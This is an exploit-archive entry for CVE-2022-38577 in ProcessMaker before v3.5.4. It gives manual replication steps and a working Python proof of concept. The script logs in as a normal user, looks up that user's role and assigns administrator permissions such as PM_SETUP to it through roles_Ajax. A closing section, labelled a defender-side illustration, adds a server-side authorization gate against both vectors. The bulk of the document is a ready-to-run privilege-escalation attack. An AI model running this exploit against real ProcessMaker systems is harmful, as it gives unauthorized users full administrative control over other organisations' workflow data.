ProcessMaker Privilege Escalation


# Exploit Title: ProcessMaker - User Profile Privilege Escalation
# Description: ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows an attacker to escalate a normal user to Administrator.
# Date: 20220822
# Exploit Author: Sornram Kampeera (Sornram9254)
# Vendor Homepage: https://www.processmaker.com
# Software Link: https://sourceforge.net/projects/processmaker/files/ProcessMaker/
# Version: ProcessMaker before v3.5.4 (Tested on 2.5.0, 2.5.2, 3.0 GA and 3.2.1)
# Tested on: Windows 11, Debian 11 (WSL2)
# CVE : CVE-2022-38577

"""
Privilege Escalation Replication.
For 2.5.0 - 3.0 GA:
1. Log in as a normal user.
2. Change "USR_ROLE" in the POST request form sent when updating the profile information to "PROCESSMAKER_ADMIN".
3. Refresh the page to receive the new role.

For 3.2.1 and earlier:
1. Log in as a normal user.
2. Get the Role ID with a request to "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
3. Get the Permission ID with a request to "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
4. Update the role with the escalated permission using this POST request body:
POST /sysworkflow/en/neoclassic/roles/roles_Ajax
request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}
"""

#!/usr/bin/python
# TODO: Optimize the code [requests module] and exception handling.
# Replace the USERNAME, PASSWORD and APP_URL variables.
import requests, json, re, argparse, sys

USER_AGENT = 'Mozilla/5.0'
APP_URL = "http://localhost:9994"
USERNAME = '__USER__'
PASSWORD = '__PASS__'

parser = argparse.ArgumentParser()
parser.add_argument("action", type=str, help="Permission UID to add to or delete from the role.", nargs="?", default=".")

parser.add_argument("-a", "--add", action="store_true", help="Add a role permission")
parser.add_argument("-d", "--delete", action="store_true", help="Delete a role permission")
parser.add_argument("-l", "--list", action="store_true", help="List all role permissions")
args = parser.parse_args()

if args.add:
    action = "assign"
elif args.delete:
    action = "delete"
elif args.list:
    action = "list"
    print("All Permission UIDs")
    print("See more: https://wiki.processmaker.com/3.3/Roles")
    PERM_LIST = """
PER_UID: 00000000000000000000000000000001, PER_CODE: PM_LOGIN
PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP
PER_UID: 00000000000000000000000000000003, PER_CODE: PM_USERS
PER_UID: 00000000000000000000000000000004, PER_CODE: PM_FACTORY
PER_UID: 00000000000000000000000000000005, PER_CODE: PM_CASES
PER_UID: 00000000000000000000000000000006, PER_CODE: PM_ALLCASES
PER_UID: 00000000000000000000000000000007, PER_CODE: PM_REASSIGNCASE
PER_UID: 00000000000000000000000000000008, PER_CODE: PM_REPORTS
PER_UID: 00000000000000000000000000000009, PER_CODE: PM_SUPERVISOR
PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE
PER_UID: 00000000000000000000000000000011, PER_CODE: PM_DASHBOARD
PER_UID: 00000000000000000000000000000012, PER_CODE: PM_WEBDAV
PER_UID: 00000000000000000000000000000013, PER_CODE: PM_DELETECASE
PER_UID: 00000000000000000000000000000014, PER_CODE: PM_EDITPERSONALINFO
PER_UID: 00000000000000000000000000000015, PER_CODE: PM_FOLDERS_VIEW
PER_UID: 00000000000000000000000000000016, PER_CODE: PM_FOLDERS_ADD_FOLDER
PER_UID: 00000000000000000000000000000017, PER_CODE: PM_FOLDERS_ADD_FILE
PER_UID: 00000000000000000000000000000018, PER_CODE: PM_CANCELCASE
PER_UID: 00000000000000000000000000000019, PER_CODE: PM_FOLDER_DELETE
PER_UID: 00000000000000000000000000000020, PER_CODE: PM_SETUP_LOGO
PER_UID: 00000000000000000000000000000021, PER_CODE: PM_SETUP_EMAIL
PER_UID: 00000000000000000000000000000022, PER_CODE: PM_SETUP_CALENDAR
PER_UID: 00000000000000000000000000000023, PER_CODE: PM_SETUP_PROCESS_CATEGORIES
PER_UID: 00000000000000000000000000000024, PER_CODE: PM_SETUP_CLEAR_CACHE
PER_UID: 00000000000000000000000000000025, PER_CODE: PM_SETUP_HEART_BEAT
PER_UID: 00000000000000000000000000000026, PER_CODE: PM_SETUP_ENVIRONMENT
PER_UID: 00000000000000000000000000000027, PER_CODE: PM_SETUP_PM_TABLES
PER_UID: 00000000000000000000000000000028, PER_CODE: PM_SETUP_LOGIN
PER_UID: 00000000000000000000000000000029, PER_CODE: PM_SETUP_DASHBOARDS
PER_UID: 00000000000000000000000000000030, PER_CODE: PM_SETUP_LANGUAGE
PER_UID: 00000000000000000000000000000031, PER_CODE: PM_SETUP_SKIN
PER_UID: 00000000000000000000000000000032, PER_CODE: PM_SETUP_CASES_LIST_CACHE_BUILDER
PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINS
PER_UID: 00000000000000000000000000000034, PER_CODE: PM_SETUP_USERS_AUTHENTICATION_SOURCES
PER_UID: 00000000000000000000000000000035, PER_CODE: PM_SETUP_LOGS
PER_UID: 00000000000000000000000000000036, PER_CODE: PM_DELETE_PROCESS_CASES
PER_UID: 00000000000000000000000000000037, PER_CODE: PM_EDITPERSONALINFO_CALENDAR
PER_UID: 00000000000000000000000000000038, PER_CODE: PM_UNCANCELCASE
PER_UID: 00000000000000000000000000000039, PER_CODE: PM_REST_API_APPLICATIONS
PER_UID: 00000000000000000000000000000040, PER_CODE: PM_EDIT_USER_PROFILE_FIRST_NAME
PER_UID: 00000000000000000000000000000041, PER_CODE: PM_EDIT_USER_PROFILE_LAST_NAME
PER_UID: 00000000000000000000000000000042, PER_CODE: PM_EDIT_USER_PROFILE_USERNAME
PER_UID: 00000000000000000000000000000043, PER_CODE: PM_EDIT_USER_PROFILE_EMAIL
PER_UID: 00000000000000000000000000000044, PER_CODE: PM_EDIT_USER_PROFILE_ADDRESS
PER_UID: 00000000000000000000000000000045, PER_CODE: PM_EDIT_USER_PROFILE_ZIP_CODE
PER_UID: 00000000000000000000000000000046, PER_CODE: PM_EDIT_USER_PROFILE_COUNTRY
PER_UID: 00000000000000000000000000000047, PER_CODE: PM_EDIT_USER_PROFILE_STATE_OR_REGION
PER_UID: 00000000000000000000000000000048, PER_CODE: PM_EDIT_USER_PROFILE_LOCATION
PER_UID: 00000000000000000000000000000049, PER_CODE: PM_EDIT_USER_PROFILE_PHONE
PER_UID: 00000000000000000000000000000050, PER_CODE: PM_EDIT_USER_PROFILE_POSITION
PER_UID: 00000000000000000000000000000051, PER_CODE: PM_EDIT_USER_PROFILE_REPLACED_BY
PER_UID: 00000000000000000000000000000052, PER_CODE: PM_EDIT_USER_PROFILE_EXPIRATION_DATE
PER_UID: 00000000000000000000000000000053, PER_CODE: PM_EDIT_USER_PROFILE_CALENDAR
PER_UID: 00000000000000000000000000000054, PER_CODE: PM_EDIT_USER_PROFILE_STATUS
PER_UID: 00000000000000000000000000000055, PER_CODE: PM_EDIT_USER_PROFILE_ROLE
PER_UID: 00000000000000000000000000000056, PER_CODE: PM_EDIT_USER_PROFILE_TIME_ZONE
PER_UID: 00000000000000000000000000000057, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_LANGUAGE
PER_UID: 00000000000000000000000000000058, PER_CODE: PM_EDIT_USER_PROFILE_COSTS
PER_UID: 00000000000000000000000000000059, PER_CODE: PM_EDIT_USER_PROFILE_PASSWORD
PER_UID: 00000000000000000000000000000060, PER_CODE: PM_EDIT_USER_PROFILE_USER_MUST_CHANGE_PASSWORD_AT_NEXT_LOGON
PER_UID: 00000000000000000000000000000061, PER_CODE: PM_EDIT_USER_PROFILE_PHOTO
PER_UID: 00000000000000000000000000000062, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_MAIN_MENU_OPTIONS
PER_UID: 00000000000000000000000000000063, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_CASES_MENU_OPTIONS
PER_UID: 00000000000000000000000000000064, PER_CODE: PM_REASSIGNCASE_SUPERVISOR"""
    print(PERM_LIST)
    sys.exit()
else:
    print("Sample Permission UIDs")
    SAMPLE_PERM_LIST = """>>> PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP
>>> PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE
>>> PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINS

python Processmaker-PoC.py --help
python Processmaker-PoC.py --list
python Processmaker-PoC.py --add 00000000000000000000000000000002
python Processmaker-PoC.py --delete 00000000000000000000000000000002"""
    print(SAMPLE_PERM_LIST)
    sys.exit()

PERMISSION_UID = args.action

# Body of the sysLogin Dynaform POST; the field list mirrors what the login page submits.
loginData = "__notValidateThisFields__=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"
loginData += "DynaformRequiredFields=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"
loginData += "__DynaformName__=sysLogin&"
loginData += "form[BROWSER_TIME_ZONE_OFFSET]=25200&"
loginData += "form[USR_PASSWORD]=" + PASSWORD + "&"
loginData += "form[USR_USERNAME]=" + USERNAME + "&"
loginData += "form[USR_PASSWORD_MASK]=&"
loginData += "form[USER_ENV]=workflow&"
loginData += "form[USER_LANG]=en"


def getResponse(rMethod, rHeaders, rUrl, rData=None):
    # Thin wrapper around requests; TLS verification is disabled for lab use.
    SSL_VERIFY = False
    response = None
    if rMethod == 'GET':
        response = requests.get(rUrl, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)
    elif rMethod == "POST":
        response = requests.post(rUrl, data=rData, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)
    else:
        print("Choose a valid HTTP method (GET or POST)")
    return response


# Authenticate and keep the PHPSESSID cookie for the following requests.
getCookie = getResponse('POST',
                        {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': USER_AGENT, 'Connection': 'close'},
                        APP_URL + '/sys/en/neoclassic/login/sysLogin',
                        loginData).cookies['PHPSESSID']
if getCookie is not None:
    # The user's own USR_UID is embedded in the usersInit page.
    getUserID = getResponse('GET',
                            {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},
                            APP_URL + '/sysworkflow/en/neoclassic/users/usersInit')
    USER_ID = re.findall(r"USR_UID\s=\s\"(\w{32})\"", getUserID.text, re.MULTILINE)[0]

    # userData returns the JSON user record, including the current USR_ROLE code.
    getRolesName = getResponse('POST',
                               {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Content-Type': 'application/x-www-form-urlencoded', 'Connection': 'close'},
                               APP_URL + '/sysworkflow/en/neoclassic/users/usersAjax',
                               'action=userData&USR_UID=' + USER_ID)

    # rolesList returns every role with its ROL_UID (step 2 of the docstring).
    getRolesList = getResponse('GET',
                               {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},
                               APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc=')

    getRolesPermission = getResponse('POST',
                                     {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},
                                     APP_URL + '/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID=ROLE_UID&type=show')

    # Pick the ROL_UID whose ROL_CODE matches the role currently assigned to this user.
    roleUID = re.findall(r"\"ROL_UID\":\"(\w{32})\",\"ROL_PARENT\":\"\",\"ROL_SYSTEM\":\"\w{32}\",\"SYS_CODE\":\"PROCESSMAKER\",\"ROL_CODE\":\"" + json.loads(getRolesName.text)['user']['USR_ROLE'] + "\"", getRolesList.text, re.MULTILINE)[0]

    def actionRoleResponse():
        # Step 4 of the docstring: assign/delete the permission on the user's own role.
        actionRoleStatus = getResponse('POST',
                                       {'User-Agent': USER_AGENT, 'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},
                                       APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax',
                                       'request=' + action + 'PermissionToRoleMultiple&ROL_UID=' + roleUID + '&PER_UID=' + PERMISSION_UID)
        return actionRoleStatus.status_code

    # Send the request once and branch on the recorded status code.
    statusCode = actionRoleResponse()
    if statusCode == 200:
        print(action.capitalize() + " role permission succeeded.")
    elif statusCode == 503:
        print("Role permission already exists.")
    else:
        print("Error!")
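Added here as a defender-side illustration, not part of the original exploit or of ProcessMaker's code: a server-side authorization gate that closes both vectors described in the header docstring. It drops a smuggled USR_ROLE field from a profile update unless the session holds PM_EDIT_USER_PROFILE_ROLE (the mass-assignment vector), and rejects assign/delete PermissionToRoleMultiple calls on roles_Ajax from any session whose role is not PROCESSMAKER_ADMIN; the session dictionary shape, the `form[...]` key spelling for the profile form, the gate's placement in front of the application and the sample profile path are assumptions.

```python
from urllib.parse import parse_qs

ROLES_AJAX = "/sysworkflow/en/neoclassic/roles/roles_Ajax"
# The "action" prefixes the exploit concatenates with "PermissionToRoleMultiple".
ROLE_MUTATIONS = {"assignPermissionToRoleMultiple", "deletePermissionToRoleMultiple"}
# Profile-form spellings of the role field (assumed; the PoC names only USR_ROLE).
ROLE_FIELDS = ("USR_ROLE", "form[USR_ROLE]")

AUDIT = []  # constructed in-memory audit trail; a real deployment would log these


def audit(session, decision, detail):
    AUDIT.append(f"user={session['user']} role={session['role']} {decision}: {detail}")


def gate(session, method, path, body):
    """Authorize one request. session = {"user", "role", "permissions": set()}.
    Returns (decision, fields): decision is "allow", "drop_field" or "deny",
    fields is the form body that may be passed on to the application."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if method != "POST":
        return "allow", fields
    # Vector for 3.2.1 and earlier: permission mutation on a role via roles_Ajax.
    if path == ROLES_AJAX and fields.get("request") in ROLE_MUTATIONS:
        if session["role"] != "PROCESSMAKER_ADMIN":
            audit(session, "deny", f"{fields['request']} ROL_UID={fields.get('ROL_UID', '?')}")
            return "deny", fields
        return "allow", fields
    # Vector for 2.5.0 - 3.0 GA: USR_ROLE injected into an ordinary profile update.
    smuggled = [k for k in ROLE_FIELDS if k in fields]
    if smuggled and "PM_EDIT_USER_PROFILE_ROLE" not in session["permissions"]:
        for k in smuggled:
            audit(session, "drop_field", f"{k}={fields.pop(k)}")
        return "drop_field", fields
    return "allow", fields


if __name__ == "__main__":
    # Constructed sessions and request bodies; UIDs are placeholders, not real values.
    normal = {"user": "alice", "role": "PROCESSMAKER_OPERATOR", "permissions": {"PM_LOGIN", "PM_CASES"}}
    body = "request=assignPermissionToRoleMultiple&ROL_UID=" + "A" * 32 + "&PER_UID=" + "0" * 30 + "02"
    print(gate(normal, "POST", ROLES_AJAX, body)[0])                         # deny
    print(gate(normal, "POST", "/profile/update",
               "form[USR_FIRSTNAME]=Alice&form[USR_ROLE]=PROCESSMAKER_ADMIN"))  # drop_field
    print("\n".join(AUDIT))
```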
